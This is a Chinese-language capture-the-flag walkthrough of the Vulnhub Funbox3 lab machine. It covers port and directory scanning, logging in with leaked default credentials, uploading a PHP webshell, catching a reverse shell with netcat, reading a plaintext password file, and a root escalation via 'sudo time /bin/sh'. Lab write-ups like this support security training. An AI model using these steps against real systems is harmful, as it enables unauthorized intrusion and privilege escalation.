Vulnhub Funbox3靶机解题详细过程
Funbox3
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:86:52:7b 1 60 PCS Systemtechnik GmbH
192.168.56.162 08:00:27:41:c1:af 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.162
NMAP 扫描
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 02:15 EST
Nmap scan report for bogon (192.168.56.162)
Host is up (0.00033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:d8:51:6e:c5:84:05:19:08:eb:c8:58:27:13:13:2f (RSA)
| 256 b0:de:97:03:a7:2f:f4:e2:ab:4a:9c:d9:43:9b:8a:48 (ECDSA)
|_ 256 9d:0f:9a:26:38:4f:01:80:a7:a6:80:9d:d1:d4:cf:ec (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_gym
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=11/8%Time=636A0202%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:41:C1:AF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.61 seconds
Get Access
在Kali Linux利用浏览器访问80端口,返回apache默认页面。
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/robots.txt
Disallow: gym
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.162
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/08 02:20:31 Starting gobuster in directory enumeration mode
===============================================================
/store (Status: 301) [Size: 316] [--> http://192.168.56.162/store/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.162/admin/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.162/secret/]
/gym (Status: 301) [Size: 314] [--> http://192.168.56.162/gym/]
/server-status (Status: 403) [Size: 279]
Progress: 219643 / 220561 (99.58%)===============================================================
2022/11/08 02:21:04 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ gobuster dir -u http://192.168.56.162/gym -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.162/gym
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/08 02:21:49 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 318] [--> http://192.168.56.162/gym/img/]
/profile (Status: 301) [Size: 322] [--> http://192.168.56.162/gym/profile/]
/admin (Status: 301) [Size: 320] [--> http://192.168.56.162/gym/admin/]
/upload (Status: 301) [Size: 321] [--> http://192.168.56.162/gym/upload/]
/include (Status: 301) [Size: 322] [--> http://192.168.56.162/gym/include/]
/LICENSE (Status: 200) [Size: 18025]
/att (Status: 301) [Size: 318] [--> http://192.168.56.162/gym/att/]
/ex (Status: 301) [Size: 317] [--> http://192.168.56.162/gym/ex/]
/boot (Status: 301) [Size: 319] [--> http://192.168.56.162/gym/boot/]
Progress: 219077 / 220561 (99.33%)===============================================================
2022/11/08 02:22:20 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ dirb http://192.168.56.162
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Nov 8 02:28:34 2022
URL_BASE: http://192.168.56.162/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.162/ ----
==> DIRECTORY: http://192.168.56.162/admin/
+ http://192.168.56.162/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.162/index.php (CODE:200|SIZE:3468)
+ http://192.168.56.162/robots.txt (CODE:200|SIZE:14)
==> DIRECTORY: http://192.168.56.162/secret/
+ http://192.168.56.162/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.162/store/
---- Entering directory: http://192.168.56.162/admin/ ----
==> DIRECTORY: http://192.168.56.162/admin/assets/
+ http://192.168.56.162/admin/index.php (CODE:200|SIZE:3263)
---- Entering directory: http://192.168.56.162/secret/ ----
+ http://192.168.56.162/secret/index.php (CODE:200|SIZE:108)
+ http://192.168.56.162/secret/robots.txt (CODE:200|SIZE:35)
---- Entering directory: http://192.168.56.162/store/ ----
+ http://192.168.56.162/store/admin.php (CODE:200|SIZE:3153)
==> DIRECTORY: http://192.168.56.162/store/controllers/
==> DIRECTORY: http://192.168.56.162/store/database/
==> DIRECTORY: http://192.168.56.162/store/functions/
+ http://192.168.56.162/store/index.php (CODE:200|SIZE:3998)
==> DIRECTORY: http://192.168.56.162/store/models/
==> DIRECTORY: http://192.168.56.162/store/template/
---- Entering directory: http://192.168.56.162/admin/assets/ ----
-----------------
END_TIME: Tue Nov 8 02:28:41 2022
DOWNLOADED: 18448 - FOUND: 9
扫描出了非常多的目录,其中/store/database中有用户名和密码。
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/store/database/readme.txt.txt
This is an simple online web store was made by using php , mysql and bootstrap.
the sql for database is put in folder sql.
the database contains many tables.
To change the localhost, username, password for connecting to database, change it only one time in
www_project/functions/database_functions.php -> db_connect() . Simple and fast
The base is localhost , root , , www_project
to connect the admin section, click the name Nghi Le Thanh at the bottom.
the name and pass for log in is admin , admin. Just to make it simple.
the 2 main things are not fully implemented is contact and process purchase.
Due to having to work with some security and online payment, the process site is just a place holder.
for futher questions, please let me know. my email: nghi.lethanh2@cou.fi
利用这里找到的用户名和密码: admin admin登录 /store/admin
成功登录,点击add new book
Can't add new data Incorrect integer value: '' for column 'publisherid' at row 1
这里需要注意publisher,可以拷贝现有的Publisher
然后可以成功上传shell.php
那么这个shell.php存在什么地方呢,可以找任何一本书,然后定位书的图片的位置,所在目录中可以看到shell.php
http://192.168.56.162/store/bootstrap/img/
成功拿到了shell
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.162] 42364
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
07:39:53 up 30 min, 0 users, load average: 0.00, 0.04, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
cd /home
www-data@funbox3:/home$ ls -lah
ls -lah
total 12K
drwxr-xr-x 3 root root 4.0K Jul 30 2020 .
drwxr-xr-x 20 root root 4.0K Jul 30 2020 ..
drwxr-xr-x 3 tony tony 4.0K Jul 31 2020 tony
www-data@funbox3:/home$ cd tony
cd tony
www-data@funbox3:/home/tony$ ls -alh
ls -alh
total 36K
drwxr-xr-x 3 tony tony 4.0K Jul 31 2020 .
drwxr-xr-x 3 root root 4.0K Jul 30 2020 ..
-rw------- 1 tony tony 30 Jul 31 2020 .bash_history
-rw-r--r-- 1 tony tony 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 tony tony 3.7K Feb 25 2020 .bashrc
drwx------ 2 tony tony 4.0K Jul 30 2020 .cache
-rw-r--r-- 1 tony tony 807 Feb 25 2020 .profile
-rw-r--r-- 1 tony tony 0 Jul 30 2020 .sudo_as_admin_successful
-rw------- 1 tony tony 1.6K Jul 31 2020 .viminfo
-rw-rw-r-- 1 tony tony 70 Jul 31 2020 password.txt
www-data@funbox3:/home/tony$ cat passwod.txt
cat passwod.txt
cat: passwod.txt: No such file or directory
www-data@funbox3:/home/tony$ cat password.txt
cat password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
www-data@funbox3:/home/tony$ su - tony
su - tony
Password: yxcvbnmYYY
tony@funbox3:~$ id
id
uid=1000(tony) gid=1000(tony) groups=1000(tony),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
tony@funbox3:~$ sudo -l
sudo -l
Matching Defaults entries for tony on funbox3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tony may run the following commands on funbox3:
(root) NOPASSWD: /usr/bin/yelp
(root) NOPASSWD: /usr/bin/dmf
(root) NOPASSWD: /usr/bin/whois
(root) NOPASSWD: /usr/bin/rlogin
(root) NOPASSWD: /usr/bin/pkexec
(root) NOPASSWD: /usr/bin/mtr
(root) NOPASSWD: /usr/bin/finger
(root) NOPASSWD: /usr/bin/time
(root) NOPASSWD: /usr/bin/cancel
(root) NOPASSWD:
/root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
tony@funbox3:~$
有很明显的提示,tony的密码,这样就可以切换到用户tony
提权
tony@funbox3:~$ ls /root/root.txt
ls /root/root.txt
ls: cannot access '/root/root.txt': Permission denied
tony@funbox3:~$ sudo /usr/bin/time /bin/sh
sudo /usr/bin/time /bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
root.flag snap
# cat root.flag
cat root.flag
__________ ___. ___________
\_ _____/_ __ ____\_ |__ _______ ___ /\ \_ _____/____ _________.__.
| __)| | \/ \| __ \ / _ \ \/ / \/ | __)_\__ \ / ___< | |
| \ | | / | \ \_\ ( <_> > < /\ | \/ __ \_\___ \ \___ |
\___ / |____/|___| /___ /\____/__/\_ \ \/ /_______ (____ /____ >/ ____|
\/ \/ \/ \/ \/ \/ \/ \/
Made with ❤ from twitter@0815R2d2. Please, share this on twitter if you want.
#
提权很简单,参考GTFOBINS网站,最后选择time命令进行提权
成功拿到了root flag!!!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
浙公网安备 33010602011771号